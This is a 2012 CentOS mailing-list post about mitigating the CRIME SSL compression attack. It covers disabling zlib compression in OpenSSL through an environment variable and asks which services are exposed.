[CentOS] SSL CRIME

Tue Sep 25 12:45:00 UTC 2012
Markus Falb <markus.falb at fasel.at>

On 25.9.2012 00:37, Leon Fauster wrote:
> Am 24.09.2012 um 23:49 schrieb Johnny Hughes:
>> On 09/24/2012 06:07 AM, Markus Falb wrote:
>>> Hi,
>>> Some of you have heard of CRIME, probably.
>>>
>>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>>
>>>>  export OPENSSL_NO_DEFAULT_ZLIB=1
>>> But there are other services but http that use ssl and are vulnerable?
>>> What is the optimal place for setting this environment variable system wide?
>>>
>>> I tried to set it in
>>> /etc/profile.d/CRIME.sh
>>> /etc/bashrc
>>> without success.
>>
>> The setting only matters if programs look for it and do something with
>> it ... so you would need to set it for the user that starts whatever
>> service you are trying to protect, if that daemon actually uses the
>> variable.
>>
>> Just because a variable does something in httpd, that does not mean the
>> same variable means the same thing to sshd or any other daemon.
> 
> 
> 
> 
> its in openssl itself (rhel5/6)
> 
> http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2
> 
> IMO, the same above would also apply for e. g. /etc/sysconfig/ldap ...

That was my understanding too. And instead of fixing X services I would
like to fix it for all services at once in one central location.

One could do it in /etc/init.d/functions maybe, but I doubt that it
would survive an update of initscripts.

Now that ssl compression got security relevant, maybe the openssl
default should be changed. Default off, enabled only explicit. Leon, I
know you suggested building a custom openssl package in an earlier
message, but to be honest, I am not very enthusiastic about maintaining
my own openssl. Maybe an upstream bugzilla should be filed.

Another related question: What services are vulnerable to CRIME or the
concepts behind CRIME and what services are not. Everyone is only
talking about http. For example I think that smtp is not vulnerable if
it does not support smtp auth, or maybe ftp is not vulnerable because it
does a separate data channel, and so on...
-- 
Kind Regards, Markus Falb

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 304 bytes
Desc: OpenPGP digital signature
URL: <http://lists.centos.org/pipermail/centos/attachments/20120925/5df56b2b/attachment-0005.sig>